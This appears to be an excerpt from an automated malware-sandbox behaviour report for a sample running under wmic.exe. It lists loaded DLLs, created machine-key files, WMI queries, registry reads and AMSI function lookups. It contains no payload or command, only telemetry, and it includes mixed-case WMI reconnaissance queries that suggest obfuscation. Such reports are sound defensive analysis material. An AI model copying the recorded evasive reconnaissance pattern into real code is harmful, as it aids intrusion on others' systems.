msxml3.dll 0x7ffbfc900000 0x7ffbfcb3efff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x7ffbfe150000 0x7ffbfe19dfff Memory Mapped File Readable, Writable, Executable False False False -
mskeyprotect.dll 0x7ffc03cc0000 0x7ffc03cd3fff Memory Mapped File Readable, Writable, Executable False False False -
ncryptsslp.dll 0x7ffc03d40000 0x7ffc03d5dfff Memory Mapped File Readable, Writable, Executable False False False -
vcruntime140.dll 0x7ffc05ea0000 0x7ffc05eb5fff Memory Mapped File Readable, Writable, Executable False False False -
wmiutils.dll 0x7ffc063e0000 0x7ffc06404fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x7ffc06410000 0x7ffc06423fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x7ffc06430000 0x7ffc06525fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x7ffc06700000 0x7ffc0698dfff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x7ffc06b80000 0x7ffc06b90fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x7ffc079e0000 0x7ffc07b97fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x7ffc07e60000 0x7ffc07edefff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x7ffc08000000 0x7ffc08009fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x7ffc0ad10000 0x7ffc0ad19fff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x7ffc0b3b0000 0x7ffc0b3c4fff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x7ffc0c360000 0x7ffc0c3c6fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x7ffc0c430000 0x7ffc0c43afff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x7ffc0c8d0000 0x7ffc0c907fff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x7ffc0d740000 0x7ffc0dac1fff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x7ffc0f200000 0x7ffc0f2c7fff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x7ffc119f0000 0x7ffc11a11fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x7ffc123a0000 0x7ffc12435fff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x7ffc12490000 0x7ffc12539fff Memory Mapped File Readable, Writable, Executable False False False -
ucrtbase.dll 0x7ffc12bc0000 0x7ffc12cb3fff Memory Mapped File Readable, Writable, Executable False False False -
schannel.dll 0x7ffc12f70000 0x7ffc12fe9fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x7ffc13030000 0x7ffc13063fff Memory Mapped File Readable, Writable, Executable False False False -
dpapi.dll 0x7ffc13070000 0x7ffc13079fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x7ffc132f0000 0x7ffc1334bfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x7ffc133a0000 0x7ffc133b6fff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x7ffc134c0000 0x7ffc134cafff Memory Mapped File Readable, Writable, Executable False False False -
ntasn1.dll 0x7ffc13550000 0x7ffc13589fff Memory Mapped File Readable, Writable, Executable False False False -
ncrypt.dll 0x7ffc13590000 0x7ffc135b6fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x7ffc136a0000 0x7ffc136ccfff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x7ffc13950000 0x7ffc13978fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ffc13a20000 0x7ffc13a33fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ffc13a40000 0x7ffc13a8afff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x7ffc13a90000 0x7ffc13a9ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ffc13aa0000 0x7ffc13aaefff Memory Mapped File Readable, Writable, Executable False False False -
wintrust.dll 0x7ffc13bf0000 0x7ffc13c44fff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x7ffc13c50000 0x7ffc14293fff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x7ffc142c0000 0x7ffc14486fff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x7ffc14490000 0x7ffc144d2fff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ffc144e0000 0x7ffc14549fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ffc14550000 0x7ffc14737fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x7ffc14740000 0x7ffc147f4fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x7ffc14800000 0x7ffc14942fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ffc14950000 0x7ffc14a6bfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x7ffc14a70000 0x7ffc15fcefff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ffc15fd0000 0x7ffc1624cfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ffc16250000 0x7ffc162f6fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ffc164b0000 0x7ffc1654cfff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ffc16550000 0x7ffc165f6fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ffc16660000 0x7ffc166bafff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x7ffc167d0000 0x7ffc1680afff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x7ffc16810000 0x7ffc16969fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ffc16970000 0x7ffc169dafff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ffc169e0000 0x7ffc16b65fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x7ffc16fa0000 0x7ffc16fa7fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ffc16fb0000 0x7ffc17070fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ffc17120000 0x7ffc171ccfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ffc171d0000 0x7ffc17325fff Memory Mapped File Readable, Writable, Executable False False False -
coml2.dll 0x7ffc17330000 0x7ffc1739efff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x7ffc173a0000 0x7ffc173f1fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ffc17400000 0x7ffc175c0fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 129 entries are omitted.
The remaining entries can be found in flog.txt.
Created Files
Filename File Size Hash Values YARA Match Actions
c:\programdata\microsoft\crypto\rsa\machinekeys\242a813bf990d2052908c0351b6b0a7a_94f34c22-5cd3-4d50-aa5e-52adff408a05 0.08 KB MD5: 84440b4d05f45b1e94b2f53f7a581c0a
SHA1: 14dc680c6e0a010f1dbe9e635060128f7d567ec7
SHA256: 35361c9d54758eaf6b63855f5063fa44463e40854dc7561c3cad3ddf75834498
False
c:\programdata\microsoft\crypto\rsa\machinekeys\242a813bf990d2052908c0351b6b0a7a_94f34c22-5cd3-4d50-aa5e-52adff408a05 2.20 KB MD5: c33b3b8b65e709d89cd6f0ac2f91f8f4
SHA1: f8e338ee94b8cdf41214ec66a9e853cbfe6ab8cb
SHA256: 1a8da512c75bb8ebeee40978fbea2c4f71e724f5cd83498e0714536d8a653787
False
Host Behavior
COM (25)
Operation Class Interface Additional Information Success Count Logfile
Create WBEMLocator IWbemLocator cls_context = CLSCTX_INPROC_SERVER True 3 Fn
Create F6D90F12-9C73-11D3-B32E-00C04F990BB4 2933BF95-7B36-11D2-B20E-00C04F983E60 cls_context = CLSCTX_INPROC_SERVER True 1 Fn
Create 8D1C559D-84F0-4BB3-A7D5-56A7435A9BA6 BFBF883A-CAD7-11D3-A11B-00105A1F515A cls_context = CLSCTX_INPROC_SERVER True 1 Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1 Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1 Fn
Create C1ABB475-F198-39D5-BF8D-330BC7189661 00000001-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER True 1 Fn
Create F5E692D9-8A87-349D-9657-F96E5799D2F4 00000001-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER True 1 Fn
Create 50369004-DB9A-3A75-BE7A-1D0EF017B9D3 00000001-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER False 1 Fn
Create WbemDefaultPathParser IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 6 Fn
Create WBEMLocator IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 2 Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli True 1 Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = root\cli\ms_409 True 1 Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\X2VS1CUM\ROOT\CIMV2 True 1 Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\localhost\root\cimv2 True 1 Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = select * from WIN32_NEtWorKADaptERCOnFIgUraTiOn True 1 Fn
Execute WBEMLocator IWbemLocator method_name = ConnectServer, network_resource = \\localhost\root\cimv2 True 1 Fn
Execute WBEMLocator IWbemServices method_name = ExecQuery, query_language = WQL, query = select * from Win32_OPERaTINgSyStem True 1 Fn
File (256)
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ True 1 Fn
Get Info C:\Windows\System32\Wbem\WMIC.config type = file_attributes False 3 Fn
Get Info C:\Users\Nd9E1FYi type = file_attributes True 5 Fn
Get Info C:\ type = file_attributes True 6 Fn
Get Info - type = file_type True 2 Fn
Get Info C:\Users\Nd9E1FYi\Desktop type = file_attributes True 7 Fn
Get Info C:\Users type = file_attributes True 4 Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_attributes True 2 Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = file_type True 2 Fn
Get Info C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config type = size, size_out = 0 True 1 Fn
Open STD_OUTPUT_HANDLE - True 1 Fn
Open Mapping Global\netfxcustomperfcounters.1.0.net clr networking desired_access = FILE_MAP_WRITE True 1 Fn
Read - size = 4096, size_out = 4096 True 194 Fn, Data
Read - size = 4096, size_out = 972 True 1 Fn, Data
Read - size = 4096, size_out = 0 True 8 Fn
Read - size = 4096, size_out = 1480 True 1 Fn, Data
Read - size = 568, size_out = 0 True 1 Fn
Read - size = 4096, size_out = 978 True 1 Fn, Data
Read - size = 4096, size_out = 214 True 1 Fn, Data
Read - size = 4096, size_out = 537 True 1 Fn, Data
Read - size = 4096, size_out = 3055 True 1 Fn, Data
Read - size = 17, size_out = 0 True 1 Fn
Read - size = 4096, size_out = 452 True 1 Fn, Data
Read - size = 4096, size_out = 1668 True 1 Fn, Data
Read - size = 380, size_out = 0 True 1 Fn
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6 Fn, Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 1459 True 1 Fn, Data
Read C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1 Fn
Registry (296)
Operation Key Additional Information Success Count
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Open Key HKEY_CURRENT_USER\Environment - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 4
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Open Key (three further passes over the same nine EventLog keys, each logged True 1: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog and its Application, HardwareEvents, Internet Explorer, Key Management Service, OAlerts, System, Windows PowerShell and Windows PowerShell\PowerShell subkeys)
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 3
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Open Key HKEY_CURRENT_USER - True 1
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727 - True 1
Open Key HKEY_CURRENT_USER - True 2
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 4
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 4
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 4
Open Key HKEY_CURRENT_USER - True 22
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 6
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 10
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 4
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 8
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 8
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 8
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 6
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 6
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 6
Open Key HKEY_CURRENT_USER - True 8
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 2
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 2
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 6
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 6
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging, data = 48 True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Logging Directory, data = 37 True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM value_name = Log File Max Size, data = 54 True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 value_name = COM+Enabled, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %ProgramFiles%\WindowsPowerShell\Modules;%SystemRoot%\system32\WindowsPowerShell\v1.0\Modules, type = REG_EXPAND_SZ True 1
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 3
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_EXPAND_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = %systemroot%\system32\netfxperf.dll, type = REG_EXPAND_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 6000, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework value_name = LegacyWPADSupport, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v2.0.50727 value_name = SchUseStrongCrypto, type = REG_NONE False 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 (32 separate calls, each logged once)
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1 (4 separate calls)
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1 (2 separate calls)
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1 (4 separate calls)
Process (2)
Operation Process Additional Information Success Count
Open c:\windows\system32\wbem\wmic.exe desired_access = PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\wbem\wmic.exe desired_access = SYNCHRONIZE True 1
Module (64)
Operation Module Additional Information Success Count
Note: the rows the sandbox reports as "Unknown module name" resolve to addresses between 0x7ffbf68f1760 and 0x7ffbf68f34c0, i.e. inside the wminet_utils.dll image loaded at 0x7ffbf68f0000 in the second row; the function names are that DLL's exports.
Load amsi.dll base_address = 0x7ffbf68c0000 True 1
Load C:\Windows\Microsoft.NET\Framework64\v2.0.50727\\wminet_utils.dll base_address = 0x7ffbf68f0000 True 1
Get Handle c:\windows\system32\wbem\wmic.exe base_address = 0x7ff66e670000 True 1
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ffc17120000 True 1
Get Handle c:\windows\system32\kernelbase.dll base_address = 0x7ffc14550000 True 1
Get Filename - process_name = c:\windows\system32\wbem\wmic.exe, file_name_orig = C:\Windows\System32\Wbem\WMIC.exe, size = 260 True 3
Get Address c:\windows\system32\kernel32.dll function = QueryProtectedPolicy, address_out = 0x7ffc145c02d0 True 1
Get Address c:\windows\system32\amsi.dll function = AmsiInitialize, address_out = 0x7ffbf68c2260 True 1
Get Address c:\windows\system32\amsi.dll function = AmsiScanString, address_out = 0x7ffbf68c26b0 True 1
Get Address c:\windows\system32\kernelbase.dll function = ResolveDelayLoadedAPI, address_out = 0x7ffc145af670 True 1
Get Address c:\windows\system32\kernelbase.dll function = ResolveDelayLoadsFromDll, address_out = 0x7ffc14611540 True 1
Get Address Unknown module name function = ResetSecurity, address_out = 0x7ffbf68f20e0 True 1
Get Address Unknown module name function = SetSecurity, address_out = 0x7ffbf68f21b0 True 1
Get Address Unknown module name function = BlessIWbemServices, address_out = 0x7ffbf68f2290 True 1
Get Address Unknown module name function = BlessIWbemServicesObject, address_out = 0x7ffbf68f23b0 True 1
Get Address Unknown module name function = GetPropertyHandle, address_out = 0x7ffbf68f24d0 True 1
Get Address Unknown module name function = WritePropertyValue, address_out = 0x7ffbf68f2500 True 1
Get Address Unknown module name function = Clone, address_out = 0x7ffbf68f2530 True 2
Get Address Unknown module name function = VerifyClientKey, address_out = 0x7ffbf68f31f0 True 1
Get Address Unknown module name function = GetQualifierSet, address_out = 0x7ffbf68f2a50 True 1
Get Address Unknown module name function = Get, address_out = 0x7ffbf68f2700 True 1
Get Address Unknown module name function = Put, address_out = 0x7ffbf68f26c0 True 1
Get Address Unknown module name function = Delete, address_out = 0x7ffbf68f2750 True 1
Get Address Unknown module name function = GetNames, address_out = 0x7ffbf68f2760 True 1
Get Address Unknown module name function = BeginEnumeration, address_out = 0x7ffbf68f27b0 True 1
Get Address Unknown module name function = Next, address_out = 0x7ffbf68f27c0 True 1
Get Address Unknown module name function = EndEnumeration, address_out = 0x7ffbf68f2810 True 1
Get Address Unknown module name function = GetPropertyQualifierSet, address_out = 0x7ffbf68f2820 True 1
Get Address Unknown module name function = GetObjectText, address_out = 0x7ffbf68f2840 True 1
Get Address Unknown module name function = SpawnDerivedClass, address_out = 0x7ffbf68f2860 True 1
Get Address Unknown module name function = SpawnInstance, address_out = 0x7ffbf68f2880 True 1
Get Address Unknown module name function = CompareTo, address_out = 0x7ffbf68f28a0 True 1
Get Address Unknown module name function = GetPropertyOrigin, address_out = 0x7ffbf68f28c0 True 1
Get Address Unknown module name function = InheritsFrom, address_out = 0x7ffbf68f28e0 True 1
Get Address Unknown module name function = GetMethod, address_out = 0x7ffbf68f28f0 True 1
Get Address Unknown module name function = PutMethod, address_out = 0x7ffbf68f2940 True 1
Get Address Unknown module name function = DeleteMethod, address_out = 0x7ffbf68f2990 True 1
Get Address Unknown module name function = BeginMethodEnumeration, address_out = 0x7ffbf68f29a0 True 1
Get Address Unknown module name function = NextMethod, address_out = 0x7ffbf68f29b0 True 1
Get Address Unknown module name function = EndMethodEnumeration, address_out = 0x7ffbf68f2a00 True 1
Get Address Unknown module name function = GetMethodQualifierSet, address_out = 0x7ffbf68f2a10 True 1
Get Address Unknown module name function = GetMethodOrigin, address_out = 0x7ffbf68f2a30 True 1
Get Address Unknown module name function = QualifierSet_Get, address_out = 0x7ffbf68f2a60 True 1
Get Address Unknown module name function = QualifierSet_Put, address_out = 0x7ffbf68f2ab0 True 1
